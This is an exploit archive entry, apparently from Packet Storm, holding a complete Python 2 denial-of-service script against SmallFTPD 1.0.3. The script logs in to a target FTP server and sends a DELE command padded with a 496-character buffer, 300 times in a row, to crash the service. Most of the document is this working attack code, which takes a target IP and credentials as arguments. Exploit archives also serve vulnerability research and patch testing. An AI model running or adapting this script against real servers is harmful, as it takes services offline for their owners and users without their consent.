SmallFTPD version 1.0.3 DELE command denial of service exploit.
7bb3d73cbab3ec01f536cee5ce392eb199b4af2b8c58d0699553025699162763# Exploit Title: SmallFTPD FTP Server DELE Command DoS
# Date: 5/13/2010
# Author: Jeremiah Talamantes
# Software Link: http://sourceforge.net/projects/smallftpd/
# Version: 1.0.3
# Tested on: Windows XP, SP2 (EN)
# CVE : N/A
#!/usr/bin/python
print "\n#################################################################"
print "## RedTeam Security ##"
print "## SmallFTPD FTP Server DELE Command DoS ##"
print "## Version 1.0.3 ##"
print "## ##"
print "## Jeremiah Talamantes ##"
print "## labs@redteamsecure.com ##"
print "################################################################# \n"
import socket
import sys
# Define the exploit's usage
def Usage():
print ("Usage: scriptname.py <IP> <username> <password>\n")
print ("\n\nCredit: Jeremiah Talamantes")
print ("RedTeam Security : www.redteamsecure.com/labs\n")
# Buffer
buffer="A" * 496
def exploit(hostname,username,password):
i=0
while i < 300:
i=i+1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Error: unable to connect to host")
sys.exit(1)
r=sock.recv(1024)
print "[+] " + r + ": running iteration number: ",i
sock.send("USER " + username + "\r\n")
r=sock.recv(1024)
sock.send("PASS " + password + "\r\n")
r=sock.recv(1024)
sock.send("DELE " + buffer + "\r\n")
sock.close()
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
password=sys.argv[3]
exploit(hostname,username,password)
sys.exit(0)
# End
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed